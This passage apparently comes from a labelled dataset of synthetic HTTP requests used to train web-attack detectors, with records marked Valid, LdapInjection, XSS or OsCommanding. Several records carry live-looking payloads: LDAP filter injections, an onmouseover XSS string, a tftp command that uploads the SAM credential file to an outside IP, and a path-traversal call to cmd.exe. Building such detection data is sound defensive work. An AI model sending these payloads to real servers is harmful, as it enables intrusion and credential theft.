Date: Sat, 17 Jun 06 10:26:42 UTC
ETag: "_a0_64jbSCr6SnLUs"
Expect: 100-continue
From: 2lttn@aSarnOJ.de
If-Modified-Since: Tue, 16 Feb 10 08:02:01 CET
If-Unmodified-Since: Fri, 29 Jan 10 11:41:03 CET
If-Match: "bGHkmOGy7KzZ7K_u"
If-None-Match: "VOM_jy.NNTKa--chLYO"
If-Range: Tue, 08 Mar 05 05:39:30 CET
Max-Forwards: 5
MIME-Version: 6.3
Pragma: uUte='kaf93bh'
Proxy-Authorization: Basic Y3RpbGhiaEU6aWdubHRobVI=
Authorization: Basic aWRhbGNudHQ6bnQ1dWV0ZQ==
Range: 74641-,-087
Referer: http://jobrmf0.com/2a7r5hI/R6tKns/ctva/Eedhiroi/Tmio.tiff
TE: trailers,gzip;q=0.3,deflate
Trailer: Authorization
User-Agent: sNMmUa. http://www.Hih34fD.gov
UA-CPU: Sparc
UA-Disp: 370,676,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: 3.5 www.eCEOb.js:29784, FTP/8.9 10.7.133.101:634
Transfer-Encoding: compress
Upgrade: tiy/3.6, xma/2.7, hcenti/3.5
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

PgdSEObLUxFu=4&egaSoife7h5sd=eetceb0&J7tncinputaHj=0&ne2ais=r 

End - Id: 33981
Start - Id: 38144
class: LdapInjection
GET /wwcert/ecrhmoetwHjWhos/p6QomuZ/n-0qb21G_WgK2b.cfm?tdteuttdN=2I&nasheis5rtpltW=6206&kpgoir5aghh=nd&aolwiKpeaoSe=9821863&fn=mid%29cd&9nVAlscriptSphpD=eYq&bodyAjnetcatF8=92036185&to4kaA=r&u0igtbwiiiute=37%29%28%26%28objectClass%3Duti%29%28%7C%28sn++%3D+++toa%29%28cn%3Dusee+++++J*%29%29&wn=jhs7zpr&ur0Oasd=Jhcasock_streaml&citntwtli=sSz28lkC0gqm HTTP/1.0
Host: www.ofsOyidaas.cz:80
Connection: oZ3neisw
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: tneuce-esits;q=0.9, srbe-qaS;q=0.5, dnecng-h9n;q=0.1
Cache-Control: max-age=24487
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="23"
Date: Sat, 14 Aug 04 24:59:29 GMT
ETag: W/"nDAIJJveFazGhbicY@"
Expect: iWePy0ea=osatn
From: ivla@elhhEa.be
If-Modified-Since: Fri, 19 Aug 05 01:42:13 CET
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: "-iOTk3vFPLoG365T"
If-Range: "3.s_T6.Yxa7_4EP.C-b"
Max-Forwards: 7684
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: NTLM bm9lcXN0bWVvdEVibjRndHhzN2hvM0N0YXJub25lbnRydDBUeQ==
Range: 652463-080254,-92,5914-088
Referer: /el7o6de/rgackLn/odeoyl6/iu3sthi.mpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 6Mttedt
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: compress
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38144
Start - Id: 14995
class: Valid
GET /snddxohftw/wnCevalFprocessing-instruction2Yaed27gj/nula/o6Rz_ye/eAXbJD4xY7D2sYfEx/tatsehsta/9PhWvufQ/enheAelnlf1/ft/rT3RgUiSah/erarleo/zoaolow.php?oeoe=436706&tnacl=d%7Ey&nneOm=44232666&gnvtgwee=sbina7a&ioihtseihhutind=49&dk13lrc=0oiu&k5saoE4oszeb=lgnaIcntnbsaAuse&mEeeusnrst=%7Ea&oe1a2ihnnehcdo=veiframeItmpa+e&0exec6iYR=11391&smfctkbrt=egnjS&vnwseCNdrn5she=es&lxl=l8dxthtpass%3Drpfhor%26b&nmpiytmpnHqpt6a=wagxnnEghrA77&cs2ElA=234312471 HTTP/1.0
Host: www.nEtbhhel.com:80
Connection: ntstS
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity, gzip;q=0.6
Accept-Language: *
Cache-Control: dvtt='Byh4Zey'
Client-ip: 107.151.95.90
Cookie: luzdowthahrrote=uo3rnueinti;asvueo=ekg5qmQFGps;4EWw4GCaSu=uxtermse46sbetweenyapan]emocha;passthruwp-UE_nIwp-=ioD hnwfR;toeerrPnoWsaU=d3;53weU=kg8trn7inE5Ae
Cookie2: $Version="14"
Date: Fri, 26 Jan 07 16:49:24 CET
ETag: "qehb@WyWushd81v9uXDa"
Expect: 100-continue
From: nMwprmei@iietnPAt.net
If-Modified-Since: Mon, 13 Jul 09 13:18:49 UTC
If-Unmodified-Since: Fri, 06 Jun 08 14:49:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5605
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM YWVvZXNFYTVub1J1aXRTcHNscmUwZW5lcmVjaWJsY2Rvc2J1
Authorization: Basic SGVoZG50ZTp5MmZjZQ==
Range: 1538-,-4818
Referer: http://tRrclt.biz/setu/s1hebe/rjlo/tLdnhckt.txt
TE: gzip;q=0.4,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 1.0; gn-6a; rv:5.9.5) Gecko/04849495
UA-CPU: StrongARM
UA-Disp: 214,7977,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8957x255
Via: 4.5 www.rtRde.js, 1.3 www.fnndseh.html, 1.5 www.xdBueo.js
Transfer-Encoding: gzip
Upgrade: qorD5j/0.6
Warning: 354 83.200.217.251 "dsry7IRe7" 
X-Forwarded-For: 86.218.51.227
X-Serial-Number: 158686381572781
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14995
Start - Id: 32328
class: Valid
GET /9GeHi49wb0-/eSOtmolulswoEea/eECDj.z/fonLMeiaeasjqbacAn/rjzp4Q5Elv48/hA71S0xtermSS/frP7insertB697/lC5EKwsg6JmH/mcyvLa0.qAHWUX/leoelhm/itnon/i_f-.css? HTTP/1.1
Host: www.3a1Dh.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: te-eeqzy32h;q=0.9, Hrhol-qegcisyt
Cache-Control: max-age=13
Client-ip: 155.74.53.10
Cookie: ssesrsn4npmxnid=dnVcudFSfE;nraueo0tdmomab=442414;V5.YXnP6N=o@ilogNiay1andte;sWiEstopdh=sikiihTfofluo
Cookie2: $Version="9"
Date: Sun, 31 Dec 06 23:56:17 CET
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Mon, 11 May 09 03:41:47 UTC
If-Unmodified-Since: Tue, 15 Dec 09 07:50:27 CET
If-Match: "FtH8lq8EXd43UOgwEWh"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Tue, 01 Jan 08 16:32:54 GMT
Max-Forwards: 5
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Basic b2FzdGo6aGV0bHhka1M=
Range: -68,-771672
Referer: /niodE.doc
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 3.1; Oh-ih; rv:7.4.5) Gecko/09539672
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: HTTP/6.6 www.tiydis.htm:3366, 1.0 www.en0rorO1.tiff, HTTP/7.2 250.255.77.19:18
Transfer-Encoding: identity
Upgrade: gETaD/6.4, von/5.0, mwsig/3.5
Warning: 297 www.heuiteE.htm:96 "afr3tepTtiirwedmhdy" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 13915181953096
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32328
Start - Id: 25457
class: Valid
GET /ehists4nuv/ohtowwRomro3ddy/iT0iM8iE/uebcsenxecs1mb4/s6u6fuyoEr2/_scriptRH2-.DpXRB/ro71XBn/BBxLhS8/q-/lT9vE0GJwg2svTM.php3? HTTP/1.1
Host: www.XhXoi.uk
Connection: t47a6a
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: deflate;q=0.5, gzip, identity, identity, gzip;q=0.6
Accept-Language: thj-vs;q=0.6
Cache-Control: no-transform
Client-ip: 16.186.114.94
Cookie: ektpl2hmeqau3=hd4geenrue3ihsre;atparh=mo4;VMXCH=240106;ohi8Pec=;n;hTft5=n5rrrcmd
Cookie2: $Version="2"
Date: Mon, 04 Feb 08 02:21:22 UTC
ETag: W/"mdU5KybQvsc9E3YT9FU"
Expect: iela
From: erech@PrbAn.gov
If-Modified-Since: Thu, 28 Apr 05 08:19:15 GMT
If-Unmodified-Since: Thu, 13 Jan 05 19:04:22 CET
If-Match: "UZXAeS6c0GmWJjLhggD0"
If-None-Match: "YoXfCbGpviku@3I"
If-Range: Mon, 30 Apr 07 05:02:47 GMT
Max-Forwards: 4022
MIME-Version: 8.3
Pragma: z=o
Proxy-Authorization: Digest uri=http://www.es3nrdl.de/qeog.pdf
Authorization: sctAu whssuy=qpgmoe
Range: -7599
Referer: http://r5oloh.org/eeNekn/p3narcpe/cartTto.mdb
TE: trailers
Trailer: Referer
User-Agent: Mozilla/7.3 (X11; U; Linux i386 4.3; a3-rs; rv:4.3.2) Gecko/81309648
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 475x4200
Via: 5.1 41.255.182.180, 0.1 143.5.27.95, FTP/8.3 201.103.242.241
Transfer-Encoding: identity
Upgrade: 9s7ea/6.2, demcn/8.6, kutsiy/1.9
Warning: 426 www.nrhesd.shtml "alyndt" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 1082193356186
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25457
Start - Id: 1941
class: Valid
GET /ao6A0P_b/e6k-passthruslocationMOexecbgsoundO/v0/c4i/CV/pX0ylg44KR/oMKL/75Tm3NyUJDpgLd/cMo/aa/rxnyetnaVurisuae8zhq.msf?ze=eEainput&ixVOeM=90313329&lxb7VyZariL=93552&yinsesr4=57523&Len=Iowa%29e&.6pJuvD=93502&xech=8958704&mOhsfEudpcsi1o=a+ HTTP/1.0
Host: www.btlou.it:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1253;q=0.5, x-mac-chinesetrad, iso-10646-ucs-2, koi8-r
Accept-Encoding: *
Accept-Language: daIhh-ly3i, ciro2eii-mg, aseoC-wd, ib3nyh-awldei6;q=0.0
Cache-Control: no-transform
Client-ip: 152.106.51.28
Cookie: oaexLmcvuin=40540859;goridnerL=on;ewlu4edntel=4Naacadnr
Cookie2: $Version="6"
Date: Fri, 18 Apr 08 15:15:51 CET
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: fyihtnev@d3neOnni.cz
If-Modified-Since: Tue, 06 Dec 05 01:57:15 UTC
If-Unmodified-Since: Fri, 21 Jul 06 17:24:11 CET
If-Match: "07eM0tl-_@yhCPdTIVO"
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 2893
MIME-Version: 1.0
Pragma: tees='Eul'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: 8erMn usNE=cpeNs1
Range: -8,9401-9800,-599
Referer: http://idr9a.gov/1yn15/gprsum/tqektyu.jsp
TE: trailers
Trailer: Date
User-Agent: ehdaaNmpno/5.1.0.8
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: HTTP/8.7 25.143.160.68:03, 3.2 171.225.176.9
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1941
Start - Id: 47924
class: XSS
GET /ahhoso/8rnu0eneeapif/pbTsx/a3F2w-10i/1YJkJ7Y7/u4td3io8e/t92Tusmw./pNzg/cmotoe3eneedimfei6/guadcsL64j/6OqFfR.php3?rE2n5tEAWw=tso&AsHghGDGB5R6=opbkbBZy&trr=jaSQ_&is6notl=00029&saeriI5dEc=25943&bahaCnwhoatrvt=hDk%40kBlN.vPE&3nV4-processing-instructionifdq=%3Cdiv+onmouseover++%3D%22+++%5Balert+++%28%27raie%27%29%3B%5D++%22+++%3E&T3jgee=2&xkl0TGQreplacekhstyle=xC1XkkUtW2FU&eteumeta6d=7&o4eles=500818&0t5S7tAZ=09&Bealler9xanet=fqreaccess_logtA&olerto=381637&VBz0imgxdjvbscript_Q=y+seu HTTP/1.1
Host: www.cmSe.com:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bmkoZoo-iorel, a-tlrgtlr, t-1orirfdu, avae-c;q=0.3
Cache-Control: thhss='kdoA'
Client-ip: 249.54.30.10
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="61"
Date: Tue, 17 Jun 08 07:32:44 CET
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: dtlie@titeAadsjb.com
If-Modified-Since: Fri, 21 Nov 08 07:20:30 CET
If-Unmodified-Since: Thu, 22 Dec 05 19:10:49 GMT
If-Match: ".n7xccyIzk3hO0XU8B.6"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Wed, 14 Dec 05 23:50:21 GMT
Max-Forwards: 4800
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: http://www.d7gnpnI.net/nxehld/leAeRm.cfm
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.8 (Windows; U; Win98 1.8; ct-9o; rv:9.8.8) Gecko/55194545
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 1.0 0.151.201.249, 2HC3/5.8 www.eohu.png, 7.6 www.zlmqtoS.jpg
Transfer-Encoding: identity
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 198.152.150.100
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47924
Start - Id: 44602
class: OsCommanding
GET /hu/e9enhnNa2ained/endciaLumfb26/bD6/s.l73EM3Z_HqIWAN/shr/ilnouiSE7yItdhW/OEgrCneblaabneeufet.png?2dk=4871&dCilhioieh=e%3Cba6%5BaH&creUueeiDto=50.112.12.173++%7C++tftp++-i+++++138.179.31.152+PUT+sam._&bidcnmsesM=8586228&eApIhl0=umu0esggrGu&eheevtiqnno=ekO0zjsY4c&xWsFh=ea8oVm&0zR=zu8eaUo4&Eeun1ek1dtwTT=f6WE_QvAEf&puksaHh2trs2ch=war&r3=5502512&i6onewn=020422438 HTTP/1.1
Host: 151.108.119.244
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tshcli-umte, aetnds-emgeOm;q=0.0, no7-32ed, ds4-anit, mleie-ru;q=0.0
Cache-Control: max-stale=9927
Client-ip: 97.130.78.86
Cookie: DOUfE1v=oitce;keYMntnrtraf=LJtkoadminIindo;ZVn@K5_0.=se
Cookie2: $Version="67"
Date: Sat, 22 Oct 05 20:37:46 CET
ETag: "YiQ@0NMwQ2OIQMTOOMbh"
Expect: gwsl=lee0l;ngaecoee
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Thu, 20 Nov 08 03:56:32 GMT
If-Unmodified-Since: Wed, 22 Jun 05 01:49:14 UTC
If-Match: *
If-None-Match: "4@_i-hVBWkkinfyOQhgW"
If-Range: *
Max-Forwards: 07
MIME-Version: 1.7
Pragma: 5b=muTns
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: http://www.msilot.it/rmtyeei/ouae/sElpeana.jsp
TE: deflate;q=0.9
Trailer: Authorization
User-Agent: Mozilla/5.9 (Machintosh; U; PPC Mac OS X 4.8; nj-st; rv:9.0.0) Gecko/06670091
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/1.4 49.139.180.106, HTTP/9.1 www.ltZsi.gif, 6.4 www.ftnx.js
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44602
Start - Id: 38134
class: LdapInjection
GET /Twrerr/t9nO0HtGM/ncmyaad4aGue/xJ4childZcOS.css?Baccess_log3clJpD-C@=eEC6C2H&Vtmboot.ini=2458%29%28%26%28objectClass%3Dsmox%29%28%7C%28sn++%3Ddsw%29%28cn%3DMcm+++++J*%29%29&edcUEcz=EdF&AMGYp-c7=475&1H4u8delete2kk=90456 HTTP/1.0
Host: 129.99.251.116
Connection: keep-alive
Accept: audio/x-wav, video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 1iio-d7, h8mto-vtnnn4;q=0.6, hre-2t4hh
Cache-Control: no-transform
Client-ip: 124.10.180.238
Cookie: mawooai=Rhn3 ei ;cT-Zw=ode0E9ehetcCA3e;Grt= 2odEyy;lohyonklhoN5ef=vyEPEPuuKcM;BdiceortUpol=ltr0Nanflia
Cookie2: $Version="146"
Date: Sun, 17 Jul 05 05:14:52 CET
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Sat, 07 Feb 09 05:42:32 UTC
If-Unmodified-Since: Sat, 12 Jul 08 04:44:13 GMT
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: "fzS1T2Fqy8lTDSXiaj@"
If-Range: "weOV50F1vup0rw5@6eHg"
Max-Forwards: 845
MIME-Version: 0.5
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: 17768-5
Referer: /nOnh.msf
TE: trailers,deflate
Trailer: From
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 1.0; ct-a5; rv:3.4.5) Gecko/13206684
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 6.3 www.Sejelz.htm:4
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 919 84.81.58.238 "tamueesan" "Sat, 10 Feb 07 17:27:43 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38134
Start - Id: 2225
class: Valid
GET /uvnmry/aY/sK6SY/axxe6sepssaAo/ebe.asp? HTTP/1.0
Host: 121.91.75.56:9136
Connection: lnev
Accept: image/png;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: coxeR-45uazht;q=0.8, 0ora-Hhfdenpo
Cache-Control: no-transform
Client-ip: 104.107.235.127
Cookie: igtep=rbzei e;tajh=94219;9pedt8nhbhgk=124;fgmaar8ain=lzu1vAov9my;ithiaj=53
Cookie2: $Version="1"
Date: Sat, 26 Feb 05 18:41:19 CET
ETag: "Uvy.yQT4V-x.0R@WV"
Expect: 100-continue
From: qihm@deseaahi.de
If-Modified-Since: Wed, 21 Oct 09 21:36:43 GMT
If-Unmodified-Since: Sat, 17 Nov 07 20:34:38 CET
If-Match: "xbAkMLuC4o-jF.kVw"
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=tSvsisht
Authorization: NTLM VXRyZXN1dGxldW9mZTY3cmVqdzFzaXdlZW50dG9ocmVlZUUzemloYm1yZGE=
Range: -9799,98225-
Referer: http://www.lHAf.biz/tre7si/aewtw/Riegit4/eargt/rshdrhef.dll
TE: trailers
Trailer: If-Modified-Since
User-Agent: cce5A/9.3.5.4.5
UA-CPU: PowerPC
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 709x4078
Via: 7.1 158.8.32.98, 0i6lo/1.9 www.f74o.css, 0.3 www.sEhaeia.gif
Transfer-Encoding: identity
Upgrade: yEnTa/2.2, edNa/0.7
Warning: 122 30.172.240.80 "fitmirsEmmaXskma" "Wed, 12 Apr 06 10:10:30 GMT"
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2225
Start - Id: 12657
class: Valid
GET /lk/earte/nevreusier2lofo/z_TlOhj@L/7H67PfOq-B5JxtermX/VLrArcplxml.DZj/e7vG/QmwgetgLPl1qmvp/knqk6gdea0nrvssn/n.83plBp.dll? HTTP/1.1
Host: 232.253.157.52
Connection: close
Accept: application/zip;q=0.3
Accept-Charset: hz-gb-2312;q=0.0, utf-7;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: Tho=iiv
Client-ip: 79.57.186.209
Cookie: re=rf01sjssdhi3nln
Cookie2: $Version="298"
Date: Thu, 09 Dec 04 06:09:11 GMT
ETag: "pADaZgPpCbC26e1ukNJy"
Expect: rnrre
From: ensmuise@t5l1rto.st
If-Modified-Since: Wed, 09 Feb 05 15:23:56 CET
If-Unmodified-Since: Wed, 22 Nov 06 10:18:29 CET
If-Match: *
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: *
Max-Forwards: 096
MIME-Version: 9.7
Pragma: 8ctsg=3tqxe
Proxy-Authorization: 4eegrE junoo=sshr
Authorization: Basic bzluZ280OmVvbW4=
Range: 4-14020,90205-
Referer: http://www.6bo2stdh.ch/asEvgtJp/rpaahe/ohw3nspm/6kolxo1/tarsHi.tar
TE: gzip,gzip,trailers
Trailer: Range
User-Agent: Mozilla/9.0 (X11; U; SunOS sun4u 2.8; aa-bl; rv:9.7.5) Gecko/63605349
UA-CPU: PowerPC
UA-Disp: 0856,221,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/8.7 0.25.70.129, ife/1.6 15.169.105.84:16, 4.2 7.43.129.128
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 665 www.JOuop.css:0947 "halpebxnaho1tefti" 
X-Forwarded-For: 204.159.248.29
X-Serial-Number: 67342985693
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12657
Start - Id: 38514
class: LdapInjection
GET /gsuEnw8iytqrb5sp/iFqSkGwn2f/ldcSsfVT0I9PLaYET/sliu4as/usnhbs2hmrehhrohtu/tdWoFAdpoviguUl_/TtnaSoewietmio/kbnifiodue1eesd/esrnR8emn4aznucxuis.jpg?oilauaApr=Iw0iethtacces%2B%7EeIt9&9mocha-UOYFhtacces=ber5uialjlsEajxlc%40lo&hsliu=xps6aehssaA&lwzeatosb=3330&uordodr59ltraae=lUvi2dB&io=1&tnot0hridxy=e+oen&MmthLa=-t&ewtupstel=626&slikeGcT=services&Y_iL=odoi%3Flaopenlcopt%27%3Ao%3Br&afvo=pn&ahmneile=h8b9czlrHl&EeEt=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.vlrsn3.it
Connection: sORth87s
Accept: application/postscript, text/plain
Accept-Charset: iso-8859-8, iso-8859-7;q=0.8, windows-1251;q=0.6, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=888
Client-ip: 83.3.20.105
Cookie: uoo0i71hpn8=8gnd4oL;edjsgnrep=0;zt0nqa81dcmerm= em0;in=t@;roahsoaouN1Bbb=1ngoa4n;sskluooeysei=is;iten6moaxe T
Cookie2: $Version="2"
Date: Thu, 09 Apr 09 14:57:28 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: lscomkd@ophedlorn.cz
If-Modified-Since: Sat, 17 Oct 09 17:34:26 UTC
If-Unmodified-Since: Wed, 19 Oct 05 06:36:08 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "MeTw4Juv6m7qN.P6GA"
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 9
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: http://nSiiu.gov/aexla/eepar/yasaiset/tocbtnhe.doc
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/4.9 (compatible; MSIE 7.7; Mac OS X; otNetnSs; 9oatisier)
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 877x552
Via: HTTP/0.1 www.xuhe.jpg
Transfer-Encoding: ehiyol; lsna=jfcsaoq1
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38514
Start - Id: 36456
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 216.38.238.102
Connection: msgd
Accept: application/*;q=0.4, video/quicktime;q=0.3
Accept-Charset: windows-1251;q=0.6, x-mac-cyrillic;q=0.0
Accept-Encoding: deflate;q=0.5
Accept-Language: *;q=0.5
Cache-Control: min-fresh=40
Client-ip: 41.52.219.46
Cookie: 4ou=0719;omo8t8twQ=roectoj
Cookie2: $Version="27"
Date: Wed, 27 May 09 08:50:13 CET
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Thu, 09 Apr 09 14:03:25 CET
Max-Forwards: 599
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: http://www.tehI.biz/ssyv/8fkAtm/eipaaahr/hxmr6/hherNeeE.dll
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (X11; U; Linux i586 1.0; i9-tS; rv:6.8.9) Gecko/18847128
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: 0.6 135.28.73.107:897
Transfer-Encoding: hsnq; otarnw=e9dd7
Upgrade: fet/9.1, iro/2.9
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36456
Start - Id: 20885
class: Valid
GET /pFH.DXsyybtE1m/wiotcct4elel.png? HTTP/1.1
Host: www.oetstiedl.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 67.83.27.83
Cookie: X.sock_streamFiLZPVevalxq=Rkiesystemsnn
Cookie2: $Version="19"
Date: Sun, 18 Feb 07 17:32:09 UTC
ETag: W/"a5CA8EZVd3GucGejhQ"
Expect: ef4mTus
From: eot6xm@geemirrlzt.biz
